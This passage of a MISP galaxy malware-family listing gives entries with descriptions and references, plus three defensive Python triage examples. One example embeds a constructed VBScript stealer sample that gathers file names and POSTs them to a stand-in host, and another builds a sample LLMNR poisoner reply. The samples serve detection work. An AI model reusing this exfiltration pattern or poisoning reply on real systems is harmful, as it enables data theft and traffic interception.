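The poisoning described above, as an added example that is not Responder's code: a minimal LLMNR wire-format builder and parser (RFC 4795 reuses the DNS header and question layout), plus the check defenders commonly run against such tools, which is to query a name that should not exist on the network and treat any answer for it as a poisoner. The canary name, transaction ID and the poisoner's reply are constructed here so the block runs offline; on a live network the query would be sent over UDP to 224.0.0.252:5355 and the socket read with a short timeout. NBT-NS and mDNS, which Responder also poisons, are not covered.

```python
import struct

LLMNR_GROUP = ("224.0.0.252", 5355)   # multicast destination a live probe would use (not used offline)


def _encode_name(name: str) -> bytes:
    out = b""
    for label in name.strip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def _decode_name(buf: bytes, off: int):
    """Decode a DNS-style name at buf[off]; handles 0xC0 compression pointers. Returns (name, next_offset)."""
    labels, end = [], None
    while True:
        ln = buf[off]
        if ln & 0xC0 == 0xC0:
            if end is None:
                end = off + 2                     # the pointer is the last thing in the field
            off = struct.unpack("!H", buf[off:off + 2])[0] & 0x3FFF
            continue
        off += 1
        if ln == 0:
            break
        labels.append(buf[off:off + ln].decode("ascii", "replace"))
        off += ln
    return ".".join(labels), (end if end is not None else off)


def build_llmnr_query(name: str, txid: int) -> bytes:
    """LLMNR A-record query: 12-byte header (QDCOUNT=1), question name, QTYPE=A, QCLASS=IN."""
    header = struct.pack("!HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + _encode_name(name) + struct.pack("!HH", 1, 1)


def parse_llmnr_response(buf: bytes) -> dict:
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", buf[:12])
    off = 12
    questions = []
    for _ in range(qd):
        qname, off = _decode_name(buf, off)
        off += 4                                  # skip QTYPE/QCLASS
        questions.append(qname)
    answers = []
    for _ in range(an):
        aname, off = _decode_name(buf, off)
        atype, _aclass, ttl, rdlen = struct.unpack("!HHIH", buf[off:off + 10])
        off += 10
        rdata = buf[off:off + rdlen]
        off += rdlen
        addr = ".".join(str(b) for b in rdata) if atype == 1 and rdlen == 4 else rdata.hex()
        answers.append({"name": aname, "type": atype, "ttl": ttl, "addr": addr})
    return {"id": txid, "is_response": bool(flags & 0x8000), "questions": questions, "answers": answers}


def looks_like_poisoner(canary: str, txid: int, reply: bytes) -> bool:
    """Nothing legitimate should answer for a name that does not exist; an A record for it is a poisoner."""
    p = parse_llmnr_response(reply)
    if not p["is_response"] or p["id"] != txid:
        return False
    return any(a["type"] == 1 and a["name"].lower() == canary.lower() for a in p["answers"])


def constructed_poisoner_reply(query: bytes, addr: str) -> bytes:
    """Constructed sample of a poisoner's answer: echo the question and add an A record that points
    at the attacker's host. Exists only so the check above can be exercised offline."""
    txid = struct.unpack("!H", query[:2])[0]
    header = struct.pack("!HHHHHH", txid, 0x8000, 1, 1, 0, 0)   # QR=1, QDCOUNT=1, ANCOUNT=1
    answer = struct.pack("!H", 0xC00C)                            # pointer to the question name at offset 12
    answer += struct.pack("!HHIH", 1, 1, 30, 4) + bytes(int(o) for o in addr.split("."))
    return header + query[12:] + answer


if __name__ == "__main__":
    canary, txid = "wpad-canary-7f3a", 0x1234          # assumed canary name; pick one no host has
    q = build_llmnr_query(canary, txid)
    r = constructed_poisoner_reply(q, "10.0.0.5")      # constructed attacker address
    print(parse_llmnr_response(r))
    print("poisoner on the segment:", looks_like_poisoner(canary, txid, r))
```

The transaction-ID check matters on a live network: without it, a stray reply to someone else's query would be reported as poisoning. Rotate the canary name per run, since a poisoner that has seen the same canary before could learn to ignore it.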
Saphyra
Internal MISP references
UUID 30a22cdb-9393-460b-86ae-08d97c626155
which can be used as unique global reference for Saphyra
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Serpent
According to Proofpoint, this is a backdoor written in Python, used in attacks against French entities in the construction, real estate, and government industries.
Internal MISP references
UUID 8052319b-f6da-4f53-a630-59245ff65eaf
which can be used as unique global reference for Serpent
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/py.serpent - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain - webarchive
- https://www.bleepingcomputer.com/news/security/serpent-malware-campaign-abuses-chocolatey-windows-package-manager/ - webarchive
- https://blogs.vmware.com/security/2022/04/serpent-the-backdoor-that-hides-in-plain-sight.html - webarchive
- https://labs.k7computing.com/index.php/uncovering-the-serpent/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SpaceCow
Internal MISP references
UUID ff5c0845-6740-45d5-bd34-1cf69c635356
which can be used as unique global reference for SpaceCow
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
stealler
Internal MISP references
UUID 689247a2-4e75-4802-ab94-484fc3d6a18e
which can be used as unique global reference for stealler
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stitch
Internal MISP references
UUID 6239201b-a0bd-4f01-8bbe-79c6fc5fa861
which can be used as unique global reference for Stitch
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Stormous
Internal MISP references
UUID e2580f5e-417b-4f21-88ba-8d3e43514363
which can be used as unique global reference for Stormous
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
unidentified_002
Internal MISP references
UUID 7e5fe6ca-3323-409a-a5bb-d34f60197b99
which can be used as unique global reference for unidentified_002
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
unidentified_003
Internal MISP references
UUID 43282411-4999-4066-9b99-2e94a17acbd4
which can be used as unique global reference for unidentified_003
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
UPSTYLE
Internal MISP references
UUID 1824c463-77df-43af-a055-d94567918f6b
which can be used as unique global reference for UPSTYLE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Venomous
Ransomware written in Python and delivered as a compiled executable created using PyInstaller.
Internal MISP references
UUID 0bd5aed2-9c74-41a5-9fcf-9379f2cb0e2c
which can be used as unique global reference for Venomous
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
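Several of the Python families on this page (BlankGrabber, Guard and Venomous above) are distributed as PyInstaller bundles, and the first triage step for such a sample is to confirm that and read the bundle's table of contents without running it. As an added example, not code from Malpedia or from any of these families, this locates the PyInstaller CArchive cookie appended to the executable, decodes it (the two cookie layouts and the TOC entry layout are the ones PyInstaller has used since version 2.x) and lists the entry names, which normally include the main script. The bundle it parses is constructed in the block and contains no real code.

```python
import struct
from typing import Optional

PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"   # CArchive cookie magic
COOKIE_V20 = "!8siiii"        # PyInstaller 2.0: magic, pkg_len, toc_off, toc_len, pyvers
COOKIE_V21 = "!8sIIii64s"     # PyInstaller >= 2.1: same fields plus python library name (64 bytes)
TOC_ENTRY_HDR = "!iIIIBc"     # entry_len, data_off, compressed_len, uncompressed_len, compressed?, type code
# type codes: s = script, z = PYZ archive, b = binary, x = data, m/M = module/package
TYPE_NAMES = {b"s": "script", b"z": "pyz", b"b": "binary", b"x": "data", b"m": "module", b"M": "package"}


def _pyver(pyvers: int) -> str:
    """pyvers is packed as major*100+minor for 3.10+ (e.g. 311), else major*10+minor (e.g. 27)."""
    if pyvers >= 100:
        return f"{pyvers // 100}.{pyvers % 100}"
    return f"{pyvers // 10}.{pyvers % 10}"


def triage_pyinstaller(data: bytes) -> Optional[dict]:
    """Return python version, bundled library name and TOC entries, or None if no cookie is present."""
    pos = data.rfind(PYINST_MAGIC)
    if pos == -1:
        return None
    if len(data) - pos >= struct.calcsize(COOKIE_V21):
        size = struct.calcsize(COOKIE_V21)
        _, pkg_len, toc_off, toc_len, pyvers, pylib = struct.unpack(COOKIE_V21, data[pos:pos + size])
        pylib = pylib.rstrip(b"\x00").decode("ascii", "replace")
    else:
        size = struct.calcsize(COOKIE_V20)
        _, pkg_len, toc_off, toc_len, pyvers = struct.unpack(COOKIE_V20, data[pos:pos + size])
        pylib = ""
    archive_start = pos + size - pkg_len          # the package ends with the cookie
    toc = data[archive_start + toc_off:archive_start + toc_off + toc_len]
    entries, i, hdr = [], 0, struct.calcsize(TOC_ENTRY_HDR)
    while i + hdr <= len(toc):
        entry_len, data_off, clen, ulen, cflag, typ = struct.unpack(TOC_ENTRY_HDR, toc[i:i + hdr])
        if entry_len < hdr:
            break                                  # corrupt TOC; stop rather than loop forever
        name = toc[i + hdr:i + entry_len].rstrip(b"\x00").decode("utf-8", "replace")
        entries.append({"name": name, "type": TYPE_NAMES.get(typ, typ.decode("latin-1")),
                        "compressed": bool(cflag), "size": ulen, "offset": archive_start + data_off})
        i += entry_len
    return {"python": _pyver(pyvers), "pylib": pylib, "entries": entries}


def build_sample_bundle() -> bytes:
    """Constructed stand-in for a PyInstaller-built executable: fake PE prefix, dummy entry data,
    a TOC with three entries and a version 2.1+ cookie. Contains no real code."""
    def entry(name: str, typ: bytes, off: int, clen: int, ulen: int, cflag: int) -> bytes:
        raw = name.encode() + b"\x00"
        raw += b"\x00" * ((16 - (18 + len(raw)) % 16) % 16)   # PyInstaller pads entries to 16 bytes
        return struct.pack(TOC_ENTRY_HDR, 18 + len(raw), off, clen, ulen, cflag, typ) + raw

    payload = b"\x00" * 64                                      # stand-in for the entries' data
    toc = (entry("pyi_rth_pkgutil", b"s", 0, 32, 40, 1)
           + entry("main", b"s", 32, 32, 48, 1)
           + entry("PYZ-00.pyz", b"z", 64, 0, 0, 0))
    pkg_len = len(payload) + len(toc) + struct.calcsize(COOKIE_V21)
    cookie = struct.pack(COOKIE_V21, PYINST_MAGIC, pkg_len, len(payload), len(toc), 311, b"python311.dll")
    return b"MZ" + b"\x90" * 200 + payload + toc + cookie


if __name__ == "__main__":
    info = triage_pyinstaller(build_sample_bundle())
    print(info["python"], info["pylib"])
    for e in info["entries"]:
        print(f"{e['type']:8} {e['size']:6} {e['name']}")
```

Script entries (type `s`) are the author's own code and are the place to look for the stealer or ransomware logic; the `PYZ-*.pyz` entry holds the bundled library modules. The entry names are the same ones a full extractor would write out as files, so this gives a quick answer to "is this really PyInstaller, which Python, and what is the entry script" before committing to decompilation.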
Venus Stealer
Venus Stealer is a Python-based infostealer observed in early 2023.
Internal MISP references
UUID 20f72d3c-87b7-4349-ad1b-59d7909c1df4
which can be used as unique global reference for Venus Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
VileRAT
Internal MISP references
UUID aba54ca9-ef0d-4061-93d1-65251e90afad
which can be used as unique global reference for VileRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
W4SP Stealer
A basic info stealer with some capability to inject code into legitimate applications.
Internal MISP references
UUID c4d46e47-3af8-4117-84ad-1e5699956f2b
which can be used as unique global reference for W4SP Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
WIREFIRE
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular WIREFIRE.
Known Synonyms |
---|
GIFTEDVISITOR |
Internal MISP references
UUID 54f3e853-5f0e-4940-9e27-79e6991886f9
which can be used as unique global reference for WIREFIRE
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
KV
Internal MISP references
UUID 37784130-81fd-40d7-87d4-38e5085513bd
which can be used as unique global reference for KV
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/sh.kv - webarchive
- https://blog.lumen.com/routers-roasting-on-an-open-firewall-the-kv-botnet-investigation/ - webarchive
- https://www.securityweek.com/wp-content/uploads/2024/01/Volt-Typhoon.pdf - webarchive
- https://blog.lumen.com/kv-botnet-dont-call-it-a-comeback/ - webarchive
- https://www.justice.gov/opa/pr/us-government-disrupts-botnet-peoples-republic-china-used-conceal-hacking-critical - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
xzbot
A backdoor introduced into versions 5.6.0 and 5.6.1 of the xz/liblzma compression library and tool, intended to enable unauthorized access via (Open)SSH on affected servers.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular xzbot.
Known Synonyms |
---|
xzorcist |
Internal MISP references
UUID 293b9d76-8e58-48bc-936b-e8dfb00f6f6c
which can be used as unique global reference for xzbot
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/sh.xzbot - webarchive
- https://www.wired.com/story/jia-tan-xz-backdoor/ - webarchive
- https://github.com/amlweems/xzbot - webarchive
- https://gynvael.coldwind.pl/?lang=en&id=782 - webarchive
- https://www.openwall.com/lists/oss-security/2024/03/29/4 - webarchive
- https://twitter.com/fr0gger_/status/1774342248437813525 - webarchive
- https://medium.com/@DCSO_CyTec/xz-backdoor-how-to-check-if-your-systems-are-affected-fb169b638271 - webarchive
- https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27 - webarchive
- https://www.linkedin.com/posts/threatmon_xz-utils-backdoor-cve-2024-3094-activity-7181228442791641088-rw2a?utm_source=share&utm_medium=member_desktop - webarchive
- https://www.sentinelone.com/blog/xz-utils-backdoor-threat-actor-planned-to-inject-further-vulnerabilities/ - webarchive
- https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094 - webarchive
- https://boehs.org/node/everything-i-know-about-the-xz-backdoor - webarchive
- https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504 - webarchive
- https://github.com/karcherm/xz-malware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
FlexiSpy (symbian)
Internal MISP references
UUID 9f85f4fc-1cce-4557-b3d8-b9ef522fafb2
which can be used as unique global reference for FlexiSpy (symbian)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BASICSTAR
Internal MISP references
UUID ca86807d-5466-496a-b41f-4bde905f9064
which can be used as unique global reference for BASICSTAR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CageyChameleon
CageyChameleon is a VBS-based backdoor that can enumerate the running processes and check for the presence of several antivirus products. It collects user and host information, the current process list and similar data, sends it to the C2 server, and then keeps issuing requests to the C2 to perform subsequent operations.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CageyChameleon.
Known Synonyms |
---|
Cabbage RAT |
Internal MISP references
UUID ea71b7c1-79eb-4e9c-a670-ea75d80132f4
which can be used as unique global reference for CageyChameleon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/vbs.cageychameleon - webarchive
- https://mp.weixin.qq.com/s/nnLqUBPX8xZ3hCr5u-iSjQ - webarchive
- https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/ - webarchive
- https://sansorg.egnyte.com/dl/3P3HxFiNgL - webarchive
- https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf - webarchive
- https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf - webarchive
- https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/ - webarchive
- https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html - webarchive
- https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf - webarchive
- https://www.clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds - webarchive
- https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314 - webarchive
- https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html - webarchive
- https://www.clearskysec.com/cryptocore-group/ - webarchive
- https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwjCk7uOzMP-AhXOYMAKHYtLCKkQFnoECBIQAQ&url=https%3A%2F%2Fi.blackhat.com%2FUSA-22%2FThursday%2FUS-22-Wikoff-Talent-Need-Not-Apply.pdf&usg=AOvVaw0deqd7ozZyRTfSBOBmlbiG - webarchive
- https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/ - webarchive
- https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
forbiks
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular forbiks.
Known Synonyms |
---|
Forbix |
Internal MISP references
UUID 2ad12163-3a8e-4ece-969e-ac616303ebe1
which can be used as unique global reference for forbiks
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GGLdr
Internal MISP references
UUID 8ca31b9b-6e78-4dcc-9d14-dfd97d44994e
which can be used as unique global reference for GGLdr
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GlowSpark
Internal MISP references
UUID ab6f8b6d-f0a0-4d2c-a81b-2dcb146914ea
which can be used as unique global reference for GlowSpark
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Grinju Downloader
Internal MISP references
UUID f0a64323-62a6-4c5a-bb3d-44bd3b11507f
which can be used as unique global reference for Grinju Downloader
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HALFBAKED
The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. HALFBAKED listens for the following commands from the C2 server:
- info: Sends victim machine information (OS, processor, BIOS and running processes) gathered via WMI queries
- processList: Sends the list of running processes
- screenshot: Takes a screenshot of the victim machine (using 58d2a83f777688.78384945.ps1)
- runvbs: Executes a VB script
- runexe: Executes an EXE file
- runps1: Executes a PowerShell script
- delete: Deletes the specified file
- update: Updates the specified file
Internal MISP references
UUID 095c995c-c916-488e-944d-a3f4b9842926
which can be used as unique global reference for HALFBAKED
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked - webarchive
- https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html - webarchive
- https://attack.mitre.org/software/S0151/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
HOMESTEEL
Internal MISP references
UUID 9058df01-6f7c-447e-9a68-83a41ef2f15f
which can be used as unique global reference for HOMESTEEL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Iloveyou
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Iloveyou.
Known Synonyms |
---|
Love Bug |
LoveLetter |
Internal MISP references
UUID bba3f3c9-f65f-45f1-a482-7209b9fa5adb
which can be used as unique global reference for Iloveyou
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Janicab (VBScript)
Internal MISP references
UUID b3cb5859-2049-43d3-aed2-73db45ed0112
which can be used as unique global reference for Janicab (VBScript)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
lampion
Malware is delivered by emails containing links to ZIP files or ZIP attachments. The ZIP contains a VBScript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files. The malware targets banking customers in Portugal.
Internal MISP references
UUID 97f89048-2a57-48d5-9272-0d1061a14eca
which can be used as unique global reference for lampion
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion - webarchive
- https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf - webarchive
- https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/ - webarchive
- https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/ - webarchive
- https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/ - webarchive
- https://securityaffairs.co/wordpress/128975/malware/hidden-c2-lampion-trojan-release-212.html - webarchive
- https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/ - webarchive
- https://www.layer8.pt/PDFs/New%20Lampion%20banking%20Trojan%20variant%20in%20the%20wild.pdf - webarchive
- https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing - webarchive
- https://seguranca-informatica.pt/the-hidden-c2-lampion-trojan-release-212-is-on-the-rise-and-using-a-c2-server-for-two-years - webarchive
- https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
LitterDrifter
Internal MISP references
UUID 31f64da5-e20b-4aa8-acf6-029bca10a7e6
which can be used as unique global reference for LitterDrifter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
lockscreen
Internal MISP references
UUID a583a2db-616e-48e5-b12b-088a378c2307
which can be used as unique global reference for lockscreen
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
MOUSEISLAND
MOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a password-protected ZIP attached to a phishing email. Based on FireEye intrusion data from responding to ICEDID-related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an intermediary downloader to install ICEDID.
Internal MISP references
UUID e9afcd80-c1c6-4194-af32-133fe31e835f
which can be used as unique global reference for MOUSEISLAND
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
NodeJS Ransomware
Downloads NodeJS when deployed.
Internal MISP references
UUID 93c87125-7150-4bc6-a0f9-b46ff8de1839
which can be used as unique global reference for NodeJS Ransomware
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RandomQuery (VBScript)
According to SentinelLabs, this is a VisualBasic-based malware that gathers system and file information and exfiltrates the data using InternetExplorer.Application or Microsoft.XMLHTTP objects.
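The two COM objects named above are the part of such a script an analyst can key on statically: a network-capable ProgID next to a collector object (file system, shell, network enumeration) is the shape of a VBScript stealer. The following triage helper is an added example, not SentinelLabs' or Malpedia's code; the ProgID-to-role table, the regexes and the sample script are constructed for illustration, and the string folding only undoes the cheap Chr(n) and "a" & "b" tricks, not real obfuscators.

```python
import re

# ProgIDs a VBScript stealer typically instantiates, mapped to the capability
# they give it. Constructed for this example from the objects named on the
# page plus common siblings; extend as needed.
COM_ROLES = {
    "internetexplorer.application": "network",
    "microsoft.xmlhttp": "network",
    "msxml2.xmlhttp": "network",
    "msxml2.serverxmlhttp": "network",
    "winhttp.winhttprequest.5.1": "network",
    "scripting.filesystemobject": "filesystem",
    "wscript.shell": "execution",
    "wscript.network": "recon",
}

CHR_RE = re.compile(r'Chr\s*\(\s*(\d{1,3})\s*\)', re.IGNORECASE)
CONCAT_RE = re.compile(r'"\s*&\s*"')
CREATEOBJECT_RE = re.compile(r'CreateObject\s*\(\s*"([^"]+)"\s*\)', re.IGNORECASE)
HTTP_OPEN_RE = re.compile(r'\.Open\s+"(POST|GET)"', re.IGNORECASE)
NAVIGATE_RE = re.compile(r'\.Navigate2?\s+', re.IGNORECASE)


def fold_strings(src: str) -> str:
    """Undo Chr(n) pieces and "a" & "b" concatenation so a ProgID split
    across fragments reappears as one literal. Chr(34) (the quote
    character) is deliberately not handled; it would need VBScript's
    "" escaping."""
    src = CHR_RE.sub(lambda m: '"%s"' % chr(int(m.group(1))), src)
    return CONCAT_RE.sub("", src)


def triage_vbs(src: str) -> dict:
    """Static triage: which COM objects are created, whether an HTTP verb or
    IE navigation is used, and whether collector + network channel co-occur
    (the RandomQuery-style exfiltration shape)."""
    folded = fold_strings(src)
    objects, roles = [], set()
    for progid in CREATEOBJECT_RE.findall(folded):
        role = COM_ROLES.get(progid.lower(), "other")
        objects.append((progid, role))
        roles.add(role)
    http_verbs = [v.upper() for v in HTTP_OPEN_RE.findall(folded)]
    uses_navigate = NAVIGATE_RE.search(folded) is not None
    likely_exfil = "network" in roles and ("filesystem" in roles or "recon" in roles)
    return {
        "objects": objects,
        "http_verbs": http_verbs,
        "uses_navigate": uses_navigate,
        "likely_exfil": likely_exfil,
    }


# Constructed sample: a file lister that ships its output via XMLHTTP, with
# the ProgID split by Chr() to dodge naive string matching.
SAMPLE_VBS = r'''
Set fso = CreateObject("Scripting.FileSystemObject")
Set http = CreateObject("Micro" & Chr(115) & "oft.XMLHTTP")
info = ""
For Each f In fso.GetFolder("C:\Users\Public").Files
    info = info & f.Name & vbCrLf
Next
http.Open "POST", "http://example.invalid/up", False
http.Send info
'''

if __name__ == "__main__":
    result = triage_vbs(SAMPLE_VBS)
    for progid, role in result["objects"]:
        print(f"CreateObject({progid}) -> {role}")
    print("HTTP verbs:", result["http_verbs"], "likely exfil:", result["likely_exfil"])
```

Run it over a directory of .vbs attachments and sort by likely_exfil first; a script with only an execution or filesystem role is a different (downloader or dropper) shape and deserves a separate rule.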
Internal MISP references
UUID 76fd3fcb-151d-4880-b97e-ea890c337aad
which can be used as unique global reference for RandomQuery (VBScript)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Starfighter (VBScript)
According to the author, this is a JavaScript-based Empire launcher that ships its own embedded PowerShell host so that it does not depend on PowerShell being available locally.
Internal MISP references
UUID e24b852c-3ede-42ac-8d04-68ab96bf53a0
which can be used as unique global reference for Starfighter (VBScript)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
STARWHALE
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular STARWHALE.
Known Synonyms |
---|
Canopy |
SloughRAT |
Internal MISP references
UUID 27c70673-d40e-46a2-8f47-13cc5738ff36
which can be used as unique global reference for STARWHALE
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/vbs.starwhale - webarchive
- https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html - webarchive
- https://www.govinfosecurity.com/iranian-apt-new-methods-to-target-turkey-arabian-peninsula-a-18706 - webarchive
- https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html - webarchive
- https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611 - webarchive
- https://www.mandiant.com/resources/telegram-malware-iranian-espionage - webarchive
- https://www.techrepublic.com/article/muddywater-targets-middle-eastern-and-asian-countries-in-phishing-attacks/ - webarchive
- https://blog.talosintelligence.com/iranian-supergroup-muddywater/ - webarchive
- https://rootdaemon.com/2022/03/10/iranian-hackers-targeting-turkey-and-arabian-peninsula-in-new-malware-campaign/ - webarchive
- https://blog.talosintelligence.com/2022/03/iranian-supergroup-muddywater.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified VBS 001
Internal MISP references
UUID ba354d45-bc41-40cd-93b2-26139db296bd
which can be used as unique global reference for Unidentified VBS 001
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 002 (Operation Kremlin)
Unnamed malware. Delivered as a remote template that drops a VBS file, which uses LOLBins to crawl the disk and exfiltrates the collected data packed into a WinRAR archive.
Internal MISP references
UUID d8e8d701-ebe4-44ab-8c5b-70a11246ddf1
which can be used as unique global reference for Unidentified 002 (Operation Kremlin)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified 003 (Gamaredon Downloader)
Internal MISP references
UUID d5955c4b-f507-4b3f-8d57-080849aba831
which can be used as unique global reference for Unidentified 003 (Gamaredon Downloader)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_003 - webarchive
- https://aaqeel01.wordpress.com/2021/01/18/docx-files-template-injection/ - webarchive
- https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/ - webarchive
- https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified VBS 004 (RAT)
Lab52 describes this as a light first-stage RAT used by MuddyWater and observed samples between at least November 2020 and January 2022.
Internal MISP references
UUID 84c6b483-ba17-4a22-809d-dc37d9ce1822
which can be used as unique global reference for Unidentified VBS 004 (RAT)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified VBS 005 (Telegram Loader)
Internal MISP references
UUID 8eb8ebbc-c5b1-47d8-816a-4e21dee145c3
which can be used as unique global reference for Unidentified VBS 005 (Telegram Loader)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Unidentified VBS 006 (Telegram Loader)
Internal MISP references
UUID a6bd28db-c1a3-44b1-8bc3-7882e2896d67
which can be used as unique global reference for Unidentified VBS 006 (Telegram Loader)
